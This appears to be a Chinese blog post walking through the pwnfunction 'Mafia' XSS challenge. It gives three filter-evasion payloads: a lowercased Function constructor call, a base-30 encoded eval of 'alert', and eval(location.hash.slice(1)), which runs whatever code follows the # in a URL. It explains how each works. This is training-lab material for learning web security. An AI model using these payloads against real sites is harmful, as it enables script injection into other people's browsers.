xss.pwnfunction-Mafia

  • 开发
  • 31

 

这个是利用的构造函数 用source来获取构造函数的源码并转化成小写

Function(/ALERT(1337)/.source.toLowerCase())()

parseInt(string, radix)

  • string:要被解析的字符串。
  • radix:解析时使用的基数(进制)。可选参数,默认为10。

用parseint将alert转成进制

这里为什么用30因为在转换进制的时候是0-9其次才是a-z也就是说他在20位加上0-9正好是30 

eval(8680439..toString(30))(1337)

 "location.hash" 是 JavaScript 中用来获取当前页面 URL 中的锚点(即 # 号后面的部分)的属性。通过访问 "location.hash",你可以获取当前页面 URL 中的锚点信息

"slice" 是 JavaScript 中用来提取字符串中指定部分的方法。

eval(location.hash.slice(1))

 

 

 

 

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-09 05:50:01       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-09 05:50:01       106 阅读

  9. 在Django里面运行非项目文件

    2024-04-09 05:50:01       87 阅读

  19. Python语言-面向对象

    2024-04-09 05:50:01       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-04-09 05:50:01       91 阅读

热门阅读

  1. ffmpeg cuda硬件解码后处理使用opengl渲染,全硬件流程

    2024-04-09 05:50:01       37 阅读

  5. 《青少年成长管理2024》029 “成长七要素之五:能力”2/5

    2024-04-09 05:50:01       38 阅读

  6. 算法刷题记录 Day36

    2024-04-09 05:50:01       30 阅读

  9. vue 不同环境打包指令的配置(vue-cli2、vue-cli3、vite)

    2024-04-09 05:50:01       32 阅读

  10. 云原生周刊:2024 年 K8s 基准报告 | 2024.4.8

    2024-04-09 05:50:01       41 阅读

  12. 如何实现docker内部容器之间的端口访问

    2024-04-09 05:50:01       38 阅读

  14. 【数据结构】FHQ-Treap

    2024-04-09 05:50:01       31 阅读

  15. 【云原生篇】K8S部署全面指南

    2024-04-09 05:50:01       28 阅读

  16. 39.Python从入门到精通—parseString 方法 Python 解析XML实例 使用xml.dom解析xml

    2024-04-09 05:50:01       27 阅读

  29. 科锐国际(计算机类),快手,CVTE,得物,蓝禾,奇安信,顺丰,康冠科技,金证科技24春招内推

    2024-04-09 05:50:01       31 阅读

  30. AWS 给IAM用户分配——允许使用 MFA,自行管理自己的密码、访问密钥和 SSH 公有密钥的权限

    2024-04-09 05:50:01       35 阅读